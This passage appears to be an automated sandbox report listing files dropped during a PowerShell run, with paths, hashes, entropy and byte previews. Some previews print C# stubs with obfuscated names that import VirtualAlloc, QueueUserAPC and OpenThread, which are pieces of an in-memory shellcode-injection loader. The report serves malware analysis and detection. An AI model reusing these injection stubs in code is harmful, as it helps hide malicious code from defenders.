                        SHA-512:7CF7A7C94D4FEC56DC2145DCDDF6F0AD6BD71835ABCB81F1B90BD6817D12989F2063660385122EA17C8DF758058F975FBC3372A1EC83E8F0F030D8B7CE836EC4
                        Malicious:false
                        Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP...............{....|.m....[...........5.......C:\Users\user\AppData\Local\Temp\RES11BF.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        C:\Users\user\AppData\Local\Temp\RES148E.tmp
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                        Category:dropped
                        Size (bytes):1332
                        Entropy (8bit):4.003514269567322
                        Encrypted:false
                        SSDEEP:24:HdzW9Nv9U8uHvhKdNII+ycuZhNoakS0PNnq92d:01U8upKdu1uloa3Uq9G
                        MD5:29E70867DFDE4F487090ABBBCB2B484F
                        SHA1:31B7F94349888DF87A60D3A792DF85D31460CA2E
                        SHA-256:C9C2C56C48B397FB5BB9ACFDF50E2ED7EFE06542BAE0BEC0A5581231FA63B8F1
                        SHA-512:43BBC13236AD8C9178FA4BD1CCF0179419EAA5FDA7C8A79B59B814557BAD0125F85D9712070021B5C6D9210138C5E3F1894F8B2CED4CBD2BA973FAB72322ADCA
                        Malicious:false
                        Preview: L.....a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP..................t..).D.>U...N.._..........5.......C:\Users\user\AppData\Local\Temp\RES148E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.k.l.r.4.j.u.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                        C:\Users\user\AppData\Local\Temp\RES1B16.tmp
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):4.001534923476038
                        Encrypted:false
                        SSDEEP:24:HYe9E26qW2KuHrFhKdNII+ycuZhNtakS7PNnq9qd:eqzKuLzKdu1ulta3xq9K
                        MD5:40F552368035B59FB38A94FC74FE0504
                        SHA1:6C04143209198C63E8E2315435BC3EB3B99BB259
                        SHA-256:6EE40A1F274E2A37AE5C850C15BC241463652ED312820B9CCCAEB7BB1C822CF1
                        SHA-512:F45BE36ED243E5F7F0E496EFE5171BAA7FD1BE3A0F83AB01300C05B09AC10D98897679338F4CFB30F25FC5BCB2D2DE34163BD339B79A65E45DCCEE7A21174603
                        Malicious:false
                        Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP.................g..{.z..$6Kgu1..........5.......C:\Users\user\AppData\Local\Temp\RES1B16.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        C:\Users\user\AppData\Local\Temp\RES451.tmp
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.975200179964607
                        Encrypted:false
                        SSDEEP:24:HOe9E26LWbhknZHFhKdNWI+ycuZhN+akS2PNnq9qd:ILtZTKd41ul+a3Kq9K
                        MD5:2997036F1D6399BDEDC49939CBDB26D4
                        SHA1:FBA41FB870A14910B1BC32C973C39C8C80458E93
                        SHA-256:F4A370736333FC785FE73DBD7468D3FF3B2003BE891BDA032A3C2994614A495F
                        SHA-512:D7054F26A09ABB72827D6AA50382AB19950F48954DD8EACE5A7855487516ED0DB28C0BB6AB2C00CB2D740C50D4EDD68B567BE1EA8EDE1B1D17119991413829A9
                        Malicious:false
                        Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP...............,....d.8.O..J.._..........4.......C:\Users\user\AppData\Local\Temp\RES451.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ccsd0th.iwn.psm1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zreigz2.4ov.ps1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34kodmfv.oiy.psm1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgdeyylx.qwp.psm1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjo40dyp.crc.psm1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_karhuzep.53l.ps1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnjjoctr.bdk.ps1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.011724479977666
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                        MD5:B1DA1EF961AA0CE50C236459261D955A
                        SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                        SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                        SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                        C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.226640803853184
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fReHW6zxs7+AEszI923fReHWRyA:p37Lvkmb6KzJYW6WZE2JYWRyA
                        MD5:0D4DF55C848FD70C7E467D2A26D53F45
                        SHA1:F4B759DBF60B7BD4760AEEE2865A47EA64FE59BC
                        SHA-256:65AD1A8591B4C85B19C20F7CB6F215675131DC225B6397BAC64CF9BA285E7F6C
                        SHA-512:5855ED3F00032735847AA9F6B55DAD2607E959509E5EDCA111693CC59EBDF9F3C298FB6A39940BC5603C94F8A5D60E97788FCE82E9BE48A955013F8D0C00438A
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs"
                        C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):5.320286032288214
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzSWbE2SWRy1KaM5DqBVKVrdFAMBJTH:Akka6aSmE2S6y1KxDcVKdBJj
                        MD5:FA46AB7E9BCF97E847F3322DB66934B8
                        SHA1:49552871F35929703C3CD5F33753436E21017849
                        SHA-256:C1CEBB10D75BF73B1B70A7855F8EC4923B79BD07EA173CB98395C0969369AE0F
                        SHA-512:FD5320F3AA7B95C4D9340BAF9358215D08AF44F6A0BEE8A9764E07FA897B4B6FA2E493B87FAF454D1A957B1F95A3CA02854BE2E892471416C046D755BDB8423B
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\CSC7C356A6CF33949CF872753BDA33569A0.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.073206673156649
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyHak7YnqqpQPN5Dlq5J:+RI+ycuZhNYHakSpQPNnqX
                        MD5:5D58A66193F5DD7122F936E757049652
                        SHA1:21888C5F01076812CAB34CA539D7AFF39C3B8C91
                        SHA-256:0735A78CEDD997EA2580034E6867C7010C496B55B3A12DADD449C590F098EDA2
                        SHA-512:5F45E1D4529795A6627FF8BA212FEC06B42F660D23AF9F53AC57AACD0C5D3C51056CC1B2722AD7AA35EC4CDC8C6531A656AEDA2F28501F112037A71522FC3D80
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.t.n.s.o.f.l.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.t.n.s.o.f.l.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.011724479977666
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                        MD5:B1DA1EF961AA0CE50C236459261D955A
                        SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                        SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                        SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.151296249516787
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fGYJ/fJrGzxs7+AEszI923fGYJ/fJrb:p37Lvkmb6KzuYJ/fJrGWZE2uYJ/fJrb
                        MD5:C5EAA36B02E3E42DCAC19315987BD2BF
                        SHA1:9E911AD12F0713B3E5C501D19BB86C77472FD22D
                        SHA-256:AA30E86130161DA18E4EB94BB2F46B956D4A23C1359588276525791FED359947
                        SHA-512:1763E1B034A500C4556525E5CCFE1839BC4F342441CC0AD54EEC4F917C0B3ADA905168E8BBFA1447050F154A37F0FBD27945075CB5ADDBEC4A71F41D3C142D5E
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs"
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.5996985608858223
                        Encrypted:false
                        SSDEEP:24:etGS0/W2dg85xyFODuhxkXdWXoWtkZfOnXF+WI+ycuZhNYHakSpQPNnq:6lkb5xykIktWEJOn1l1ulGa3Cq
                        MD5:49B131E65B23D979BA7ED017BA9C7F61
                        SHA1:E4F38CA7AD5EE7CDD3755D0AF594DCE2EBB29035
                        SHA-256:EDAB1CDD86EBBB84944E94F478BFADF9B7704336C65BE2CF7EF74A2691261512
                        SHA-512:45C0B537C27F0694CD6C31481830D1BB220475DD1638B2A19E4635B90D27CD4BCDF3FD44E5165317C78819FB2700969F759254148F7D13E96999F8F2E577FB7D
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......].........c.....k.....r.....w...............]. ...]...!.].%...].......*.....3.......6.......H.......P...........
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):5.289875059357362
                        Encrypted:false
                        SSDEEP:12:xKIR37Lvkmb6KzuYJ/fJrGWZE2uYJ/fJraKaMK4BFNn5KBZvK2wo8dRSgarZucvs:AId3ka6KzZE2gKaM5DqBVKVrdFAMBJTH
                        MD5:5520D1A07EE800264B0E26905CDD21F1
                        SHA1:AB2EBB2894E8B4D6800436C7D1678737430BB273
                        SHA-256:5658F5CB41F431B1472EEF88932E02DEF879A12362D986DFD847F6E7EEA41DA8
                        SHA-512:7C9DB98B82C608CC22A132923F42F1358B08776A033B012C06BFF2B747C28CB72B1C05C13DFA12DFC4E66A1A2F14F614F74329B0BE67CD2086A92D1B1B4A04F2
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.0739498574927255
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywak7Ynqq2PN5Dlq5J:+RI+ycuZhN+akS2PNnqX
                        MD5:2C961A918364FF38854F8EC54AF4945F
                        SHA1:B0B1AF0532EAC84BAF2E604E3FF19E39D365B473
                        SHA-256:501BAEF967AAD4AB2AA2F5BFC768E871A8E98381C5AA409ADBCA5E31538DF8F1
                        SHA-512:11EB0EDBDBB19470C827A85E25BDD9989476E58B9E6074C91DD38CCEDD5935B7F23D842A1CFE1E852E6044E385DFDEC0C6B65800FFE5F07813171650BA8F48D7
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.049516587690195
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                        MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                        SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                        SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                        SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                        C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.199068343906432
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fjoQ0zxs7+AEszI923fjoG:p37Lvkmb6KzLorWZE2LoG
                        MD5:30EEDF26D86038CE52442382C4102198
                        SHA1:CF34BD8F77949FE161B5776819A519BE39E881D4
                        SHA-256:4FB991BB47038A3CE9017D5F7A9C5AF7437683FB51BD2FD9CE697EF26221ABB7
